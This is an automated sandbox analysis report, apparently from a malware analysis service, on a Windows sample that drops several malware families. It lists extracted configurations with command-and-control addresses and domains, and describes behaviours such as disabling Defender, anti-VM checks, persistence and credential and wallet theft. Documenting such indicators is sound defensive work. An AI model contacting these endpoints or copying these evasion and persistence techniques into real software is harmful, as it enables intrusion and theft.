Analysis
-
max time kernel
75s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
03/04/2025, 06:37
Static task
static1
Behavioral task
behavioral1
Sample
c19e763bd975bce9126d430b791daafb.exe
Resource
win10v2004-20250313-en
General
-
Target
c19e763bd975bce9126d430b791daafb.exe
-
Size
1.8MB
-
MD5
c19e763bd975bce9126d430b791daafb
-
SHA1
da1675700c0f3c5e58f7ba0377a505634730e653
-
SHA256
679cd77725c32a0d630aa1599d683720d738c24148ebfb04b9509f561862906e
-
SHA512
662822b1472e814849cff1da77ba27d7f78d2ec0615a12ba04140238bbee00ba7c2b54aa502c345e17630cf8de1d2f1fdb48316f65bfd7a3a83ce1904f91ad5c
-
SSDEEP
49152:dZZm4fHinhF0I5XpeSVVIDbFL9mploGbqqXdol:dZ44KhTlYSVVQh9mpfbqq2
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://ironloxp.live/aksdd
https://metalsyo.digital/opsa
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://gspacedbv.world/EKdlsk
https://1galxnetb.today/GsuIAo
https://3starcloc.bet/GOksAo
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://hcosmosyf.top/GOsznj
https://hywnnavstarx.shop/FoaJSi
https://cosmosyf.top/GOsznj
https://1targett.top/dsANGt
https://rlxspoty.run/nogoaz
https://jrxsafer.top/shpaoz
https://krxspint.digital/kendwz
https://rhxhube.run/pogrs
https://grxeasyw.digital/xxepw
https://exrfxcaseq.live/gspaz
https://ywmedici.top/noagis
https://0ironloxp.live/aksdd
https://otargett.top/dsANGt
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Extracted
vidar
13.3
928af183c2a2807a3c0526e8c0c9369d
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Extracted
gcleaner
185.156.73.98
45.91.200.135
Signatures
-
Amadey family
-
Asyncrat family
-
Detect Vidar Stealer 30 IoCs
resource yara_rule behavioral1/memory/6108-246-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-247-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-279-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-289-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-294-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-301-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-304-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-322-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-325-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-326-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-330-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-341-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-716-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-728-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-727-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-751-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-754-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-784-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-786-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-787-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-791-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-860-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-1160-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-1192-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-1189-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-1213-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-1294-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-1312-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-1701-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/6108-1785-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/7164-2202-0x0000000000F10000-0x000000000137E000-memory.dmp healer behavioral1/memory/7164-2208-0x0000000000F10000-0x000000000137E000-memory.dmp healer behavioral1/memory/7164-2402-0x0000000000F10000-0x000000000137E000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/memory/3448-130-0x000000000CFD0000-0x000000000D124000-memory.dmp family_quasar behavioral1/memory/3448-131-0x00000000057D0000-0x00000000057EA000-memory.dmp family_quasar -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/1432-151-0x0000000000400000-0x000000000073A000-memory.dmp family_stormkitty -
Stormkitty family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c19e763bd975bce9126d430b791daafb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 25803510b2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7a76898fa2.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 52 3448 powershell.exe 130 3448 powershell.exe 355 3448 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3836 powershell.exe 18492 powershell.exe 23912 powershell.exe 380 powershell.exe 5968 powershell.exe 3448 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 14 IoCs
flow pid Process 74 4868 rapes.exe 74 4868 rapes.exe 181 4868 rapes.exe 181 4868 rapes.exe 181 4868 rapes.exe 76 1508 futors.exe 65 4868 rapes.exe 304 1508 futors.exe 30 4868 rapes.exe 30 4868 rapes.exe 30 4868 rapes.exe 133 1508 futors.exe 108 1508 futors.exe 108 1508 futors.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 4424 takeown.exe 5100 icacls.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4640 chrome.exe 4748 chrome.exe 2520 msedge.exe 3556 msedge.exe 380 msedge.exe 1176 chrome.exe 684 chrome.exe 1744 chrome.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7a76898fa2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8c3b034fea.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c19e763bd975bce9126d430b791daafb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 25803510b2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 25803510b2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8c3b034fea.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c19e763bd975bce9126d430b791daafb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7a76898fa2.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation c19e763bd975bce9126d430b791daafb.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation 427e1a688b.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e48f63a6.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e48f63a6.cmd powershell.exe -
Executes dropped EXE 27 IoCs
pid Process 4868 rapes.exe 3716 dojG16n.exe 1372 PJ7KEk9.exe 4540 4WMUMmx.exe 3520 apple.exe 3152 261.exe 396 261.exe 1552 amnew.exe 1508 futors.exe 3156 rapes.exe 64 futors.exe 5228 25803510b2.exe 5580 v7942.exe 868 svchost015.exe 4184 a9048da77e.exe 5812 alex12312321.exe 932 40e05db4e7.exe 2440 a3f39ef5ef.exe 3108 bot.exe 5680 bot.exe 3752 7a76898fa2.exe 5852 legendarik.exe 4716 8c3b034fea.exe 4608 427e1a688b.exe 5748 36fe42cf07.exe 1496 Constraints.com 4136 crypted.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine 25803510b2.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine 7a76898fa2.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine c19e763bd975bce9126d430b791daafb.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 4424 takeown.exe 5100 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7a76898fa2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10427860101\\7a76898fa2.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8c3b034fea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10427870101\\8c3b034fea.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\36fe42cf07.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10427880101\\36fe42cf07.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00080000000243ea-1656.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 4896 tasklist.exe 4192 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 1496 c19e763bd975bce9126d430b791daafb.exe 4868 rapes.exe 3156 rapes.exe 5228 25803510b2.exe 3752 7a76898fa2.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 3716 set thread context of 5876 3716 dojG16n.exe 100 PID 1372 set thread context of 5476 1372 PJ7KEk9.exe 104 PID 4540 set thread context of 1432 4540 4WMUMmx.exe 115 PID 5580 set thread context of 6108 5580 v7942.exe 197 PID 5228 set thread context of 868 5228 25803510b2.exe 198 PID 4184 set thread context of 740 4184 a9048da77e.exe 200 PID 5812 set thread context of 3328 5812 alex12312321.exe 202 PID 5852 set thread context of 4136 5852 legendarik.exe 240 PID 4136 set thread context of 1500 4136 crypted.exe 260 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\ZuMiller 427e1a688b.exe File opened for modification C:\Windows\SyntheticLil 427e1a688b.exe File created C:\Windows\Tasks\rapes.job c19e763bd975bce9126d430b791daafb.exe File opened for modification C:\Windows\CongressJvc 427e1a688b.exe File opened for modification C:\Windows\MadnessSet 427e1a688b.exe File opened for modification C:\Windows\DealersFocuses 427e1a688b.exe File opened for modification C:\Windows\LocksWisconsin 427e1a688b.exe File opened for modification C:\Windows\NewcastlePeripherals 427e1a688b.exe File opened for modification C:\Windows\LimeNirvana 427e1a688b.exe File opened for modification C:\Windows\ExceedExec 427e1a688b.exe File opened for modification C:\Windows\AndorraPrint 427e1a688b.exe File opened for modification C:\Windows\PolarRail 427e1a688b.exe File opened for modification C:\Windows\AucklandChef 427e1a688b.exe File opened for modification C:\Windows\DependMedication 427e1a688b.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5512 sc.exe 3180 sc.exe 5876 sc.exe 1372 sc.exe 2240 sc.exe 3472 sc.exe 4612 sc.exe 2216 sc.exe 3656 sc.exe 2772 sc.exe 3616 sc.exe 4428 sc.exe 896 sc.exe 5480 sc.exe 1844 sc.exe 1692 sc.exe 5388 sc.exe 1728 sc.exe 5000 sc.exe 5400 sc.exe 456 sc.exe 4496 sc.exe 3208 sc.exe 4384 sc.exe 3640 sc.exe 4468 sc.exe 5844 sc.exe 4472 sc.exe 3560 sc.exe 2956 sc.exe 4956 sc.exe 3256 sc.exe 5676 sc.exe 3148 sc.exe 1656 sc.exe 5748 sc.exe 3336 sc.exe 5604 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 4296 1432 WerFault.exe 115 16964 2876 WerFault.exe 309 17020 1372 WerFault.exe 296 17236 1648 WerFault.exe 287 18388 1044 WerFault.exe 300 24128 20384 WerFault.exe 341 7196 21896 WerFault.exe 353 -
System Location Discovery: System Language Discovery 1 TTPs 44 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 36fe42cf07.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 427e1a688b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36fe42cf07.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 40e05db4e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 25803510b2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Constraints.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 36fe42cf07.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7a76898fa2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c19e763bd975bce9126d430b791daafb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4520 timeout.exe 528 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 3024 taskkill.exe 6068 taskkill.exe 4172 taskkill.exe 1744 taskkill.exe 2768 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
